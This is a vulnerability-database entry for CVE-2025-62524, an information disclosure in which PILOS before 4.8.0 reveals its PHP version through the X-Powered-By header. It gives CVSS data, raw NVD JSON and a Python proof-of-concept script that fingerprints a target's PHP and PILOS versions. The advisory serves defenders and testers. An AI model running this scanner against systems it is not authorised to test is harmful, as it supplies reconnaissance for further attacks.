Security Vulnerability Report
中文
CVE-2025-62524 CVSS 5.3 MEDIUM

CVE-2025-62524

Published: 2025-10-27 21:15:38
Last Modified: 2025-11-04 18:36:37
Source: [email protected]

Description

PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. PILOS before 4.8.0 exposes the PHP version via the X-Powered-By header, enabling attackers to fingerprint the server and assess potential exploits. This information disclosure vulnerability originates from PHP’s base image. Additionally, the PHP version can also be inferred through the PILOS version displayed in the footer and by examining the source code available on GitHub. This information disclosure vulnerability has been patched in PILOS in v4.8.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:thm:pilos:*:*:*:*:*:*:*:* - VULNERABLE
PILOS < 4.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62524 PoC - PILOS PHP Version Information Disclosure # Description: PILOS before 4.8.0 exposes PHP version via X-Powered-By header # Severity: Medium (CVSS 5.3) # Attack Type: Information Disclosure import requests import sys import re def check_pilos_version_disclosure(target_url): """ Check if PILOS instance leaks PHP version via X-Powered-By header """ print(f"[*] Checking target: {target_url}") print("-" * 60) try: # Send HTTP HEAD request to get headers without downloading full content response = requests.head(target_url, timeout=10, allow_redirects=True) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Headers:") # Check for X-Powered-By header php_version = None for header_name, header_value in response.headers.items(): print(f" {header_name}: {header_value}") if header_name.lower() == 'x-powered-by': php_version_match = re.search(r'PHP[/\s]*([\d.]+)', header_value, re.IGNORECASE) if php_version_match: php_version = php_version_match.group(1) print("-" * 60) if php_version: print(f"[!] VULNERABLE: PHP version exposed via X-Powered-By: {php_version}") print(f"[!] Attackers can use this information to identify known PHP vulnerabilities") return True else: print(f"[+] SAFE: No PHP version information leaked in headers") return False except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}") return False def get_page_footer_version(target_url): """ Check if PILOS version is exposed in page footer """ try: response = requests.get(target_url, timeout=10) # Search for PILOS version pattern in page content version_match = re.search(r'PILOS\s*v?([\d.]+)', response.text, re.IGNORECASE) if version_match: print(f"[*] PILOS version detected in footer: {version_match.group(1)}") return version_match.group(1) except: pass return None if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = input("Enter PILOS target URL: ").strip() if not target.startswith(('http://', 'https://')): target = 'https://' + target vulnerable = check_pilos_version_disclosure(target) get_page_footer_version(target) print("-" * 60) if vulnerable: print("[!] Target is vulnerable to CVE-2025-62524") print("[!] Recommendation: Upgrade to PILOS >= 4.8.0 or disable X-Powered-By header") sys.exit(1) else: print("[+] Target appears to be patched") sys.exit(0)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62524", "sourceIdentifier": "[email protected]", "published": "2025-10-27T21:15:37.930", "lastModified": "2025-11-04T18:36:37.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. PILOS before 4.8.0 exposes the PHP version via the X-Powered-By header, enabling attackers to fingerprint the server and assess potential exploits. This information disclosure vulnerability originates from PHP’s base image. Additionally, the PHP version can also be inferred through the PILOS version displayed in the footer and by examining the source code available on GitHub. This information disclosure vulnerability has been patched in PILOS in v4.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thm:pilos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.8.0", "matchCriteriaId": "91445D94-4D77-4EFF-A078-6AEF72F6E116"}]}]}], "references": [{"url": "https://github.com/THM-Health/PILOS/commit/14655bc4f8128ffd2b3c25004b01d9a802808da8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/THM-Health/PILOS/security/advisories/GHSA-q93h-5j6h-j22x", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.